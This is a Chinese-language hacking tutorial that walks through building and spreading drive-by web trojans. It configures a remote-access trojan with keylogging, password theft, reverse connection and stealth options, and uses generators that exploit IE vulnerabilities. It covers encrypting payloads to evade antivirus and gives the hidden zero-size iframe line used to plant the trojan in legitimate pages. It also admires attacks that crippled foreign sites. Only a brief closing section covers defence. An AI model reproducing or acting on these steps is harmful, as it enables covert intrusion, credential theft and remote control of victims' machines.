黑客营从入门到精通之网页木马如何成为隐形杀手
黑客·安全
防范难度★★★★
操作难度★★★
网页木马是现在非常流行的一种木马传播方式,或者可以说是一种全新的木马伪装方式。黑客首先将木马转化为网页可以识别的脚本文件、ActiveX组件、ASP、图片等文件形式,然后利用微软的Windows系统和IE浏览器存在的某些漏洞,当用户访问某个存在木马的网页后,木马程序已经被秘密种植在系统中了。
陈经韬
国内知名木马——黑洞的作者,长期致力于木马、网页木马、系统漏洞、编程等方面的研究。在黑洞2002版的时候,就首创直接将服务端程序生成BMP网页木马的技术,直到这几年才在网页木马中开始流行。这么多年,多次参加针对美国、日本、台湾等网站的攻击行动,造成网址服务器陷入瘫痪,并长时间关闭。
入侵实战
配置木马
要制作网页木马,首先要配置一个木马的服务端。今天我们使用的木马就是陈经韬开发的黑洞皮鲁专用版。双击客户端程序,点击“文件”菜单下的“配置服务端”命令,在弹出的“服务端程序配置”窗口进行服务端的配置。首先设置一下服务端的基本项,在“注册表启动路径”和“程序安装路径”选项中对木马的启动项和安装项进行设置,然后设置服务端的启动名称,以及程序安装名称。
大家记住一定要选中“安装完毕后删除安装文件”选项,不然就会留下安装程序这个“罪证”;另外为了避免打草惊蛇,一定要将“在任务栏显示图标”和“安装完毕后提示”这两个选项的钩去掉。其他的“使用屏幕录像功能”、“使用键盘记录功能”和“使用系统密码功能”等功能选项,根据自己的需要进行设置(图1)。
黑洞皮鲁专用版在客户端和服务端连接时既可采用传统的自动连接方式,也可使用现在流行的反弹连接方式。本次讲解我们就采用反弹连接进行配置。在“反向连接”选项卡的“上线显示名称”和“获取IP地址URL”选项中,分别设置该服务端的上线名称,以及用于服务端和客户端连接的域名。如果你没有现成的域名可以使用的话,单击下面的“查看”按钮,在弹出的“更新IP地址”界面中选择“YEAH.NET更新IP”面板,这里我们可以使用网易公司的免费二级域名。输入你注册的域名和密码,单击“注册”按钮,在下面的窗口中会反映出注册的情况(图2)。
域名注册成功以后,退回“服务端程序配置”窗口,填入刚刚申请的域名,点击“测试URL地址”测试域名输入是否正确。所有的设置都完成后,点击“生成服务端程序”就会弹出一个服务端程序生成窗口,点击“EXE运行反向连接型”和“DLL插入反向连接型”后的“选择”按钮,选择相应的服务端程序,点击“生成DLL插入型服务端”按钮就可以生成一个反弹连接的服务端程序(如图3)。
制作网页木马
要制作网页木马,要使用到一类名为网页木马生成器的工具,下面就为大家介绍几款有代表性的网页木马生成器。
简单易用的EXE2BMP
这款工具是最早的网页木马生成器之一。EXE2BMP可以将一个EXE可执行文件转化为同名的BMP、ASP、HTM三个类型的文件。将这三个文件放到一个支持ASP的网页空间中,当用户浏览HTM文件的时候,黑客设置的木马程序将被自动下载到远程用户的硬盘中并运行,该功能利用了IE的HTA漏洞。
EXE2BMP是一款绿色软件,下载后双击即可使用。EXE2BMP的操作非常简单,首先点击“选择”按钮选择需要制作成为网页木马的木马程序(图4),然后点击“生成”按钮就会在木马程序所在的文件夹生成三个同名的BMP、ASP、HTM文件,这个同名的BMP文件实际上就是我们设置的木马程序。现在将生成的三个文件上传到用户的网络空间里,把该网页木马的链接发给别人使之运行就可以了。
虽然按照上面的步骤就可以成功生成网页木马并且能够使用,但是当远程用户浏览了该网页后,有两点可能会引起用户的怀疑。首先当用户浏览这个网页后,网页木马会弹出一个窗口,上面会提示“正在连接服务器....请不要关闭!”的字样,其次在网页上也一直显示“数据装载中,可能需要10秒至30秒............”,这些会引起别人的怀疑。
穿透SP2的IE网页木马生成器
随着Windows XP SP2的推出,系统的安全性也进行了大幅度提高,所以用EXE2BMP这样的早期网页木马生成器制作的网页木马,对Windows XP SP2系统就显得无能为力了。所以我们要使用全新的网页木马生成器才行,下面要介绍的IE网页木马专业版生成器就是一款非常优秀的网页木马生成器。这款生成器主要是利用了微软最新的IFRAME溢出漏洞来制作网页木马的。
首先运行网页木马生成器程序,在弹出的界面中进行网页木马的配置。首先需要将配置好的服务端程序上传到自己的网页空间中,接着在生成器的“木马程序路径”选项后输入刚刚上传的木马服务端程序的网页路径。由于IFRAME溢出漏洞所影响的程序主要是IE浏览器,所以网页木马生成器还为用户提供了关于IE进程的选项。另外在内存处理方式上,同样为用户提供了两个选项。
这款生成器除了利用IFRAME溢出漏洞外,针对IE5.0、IE5.5这样低版本的浏览器程序,还可以生成CHM型的网页木马。选中“对于IE5.0、IE5.5使用冰狐浪子超级木马(即CHM型木马)”选项,然后将你配置生成的木马服务端程序放到生成器的CHM目录下,接着分别在“你的木马程序名称”、“生成后的CHM文件名”和“存放CHM文件的完整地址”三个项目中输入相应的配置。
上面的配置完成后,为了避免杀毒软件的查杀,我们要选中“对生成的网页木马代码进行压缩或加密”选项,这样的话,生成器就会自动对生成的网页木马进行压缩、加密、重新编码的处理,最后点击“生成”按钮即可生成网页木马(图5)。
安置木马
安置木马实际上就是在一个正规的网页中,植入一段特殊的网页代码(这是一段常见的挂马代码:<iframe src=木马网页地址 width=0 height=0></iframe>),使人们在浏览这个正规的网页的同时,浏览器会自动打开另一个含有木马的网页。这样就比我们通过电子邮件、即时通讯软件等发送传播我们的网页木马更加隐蔽。
至此,我们已经完成了一个网页木马的基本制作。当有人浏览到含有木马的网页后,网页就会激活远程系统中可能存在的漏洞,进而下载网页中的木马程序并自动运行。接着服务端根据配置信息连接到客户端,这样黑客就可以开始对服务端电脑进行远程控制了。
攻击后果以及防范
通过网页木马来进行入侵,成为现在攻击个人电脑系统最常见的一种方式。从前面的介绍可以看出,网页木马之所以能够被大量使用。除了人们的网络安全意识淡薄之外,就是网页木马的制作异常简单,普通用户只要对木马程序和网页木马生成器进行简单的设置,就可以完成网页木马的制作。上网用户如果一旦浏览到这些带有木马的网页,那么系统就会被远程控制。
因为网页木马这种攻击的高危害性,所以广大网络用户一定要提高警惕,使用各种有效的方法对这种攻击手段进行防范。
1.首先将自己的操作系统更新到最新的版本,比如Windows XP SP2,接着对自己的电脑系统进行检查,对发现的漏洞尽快进行修补,使用Windows系统自带的 Update功能尽快安装上最新的补丁。
2.安装网络防火墙,对需要连接到网络的程序进行有效甄别,对那些不熟悉的程序的连接请求一律不予通过。
3.安装最新版本的杀毒软件,最好是那些含有注册表监控以及脚本监控的杀毒软件,并且将病毒库升级到最新的版本,这样可以有效防范各种木马程序和网页木马的入侵。
4.建立良好的安全习惯,不要打开一些来历不明的邮件及网页链接,不要到不确定的网页地址浏览及下载文件等。
